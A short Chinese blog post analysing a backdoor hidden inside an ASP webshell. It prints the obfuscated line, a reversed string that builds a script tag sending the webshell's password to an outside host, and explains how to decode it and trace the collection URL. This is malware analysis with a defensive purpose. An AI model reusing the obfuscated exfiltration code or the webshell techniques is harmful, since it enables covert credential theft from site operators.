webshell后门分析第二篇

暗月博客 2019年11月21日15:59:02评论343 views字数 743阅读2分28秒阅读模式
摘要

看到这篇先看第一篇:http://www.moonhack.org/post-141.html             今晚又有学员发来一只马 现在asp的马 基本都是同一只马修改出来的 检测原理大致相同。

webshell后门分析第二篇

看到这篇先看第一篇:

http://www.moonhack.org/post-141.html

             今晚又有学员发来一只马 现在asp的马 基本都是同一只马修改出来的 检测原理大致相同。

如图:这只马大家都有:我就不发了

webshell后门分析第二篇

技术好点的 肯定将后门加密才发出来。

             今天这只又没有加密

             按照上次的检测流程 找到 上次的地方 看了一下没有问题。

if session("KKK")<>UserPass then if request.form("pass")<>"" then if request.form("pass")=UserPass then session("KKK")=UserPass if instr(url,lcase("lpt"))<0 then response.redirect url else

这次估计是像以前的老方法收信。

比较好找现在webshell的后门内基本都是把密码的字段 传入来进行判断。

所以只要跟踪UserPass 基本都能找到收信的网址:

很多的时候都需要字符串

acodee="=u?/moc.81sid.d//:ptth'=crs tpircs<":Efun=StrReverse(acodee):Efun=Efun&uu&"&p="&userpass&"'></script>

StrReverse 这个是字符串反串的意思 新建一个asp文件 输出看看就行了

<% acodee="=u?/moc.81sid.d//:ptth'=crs tpircs<":Efun=StrReverse(acodee): Response.Write(Efun): %>

webshell后门分析第二篇

u是传进来的密码
很简单吧 。。。。。。。。。。。。。。。。。。。。。。。。。。。

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
暗月博客
  • 本文由 发表于 2019年11月21日15:59:02
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   webshell后门分析第二篇http://cn-sec.com/archives/71023.html

发表评论

匿名网友 填写信息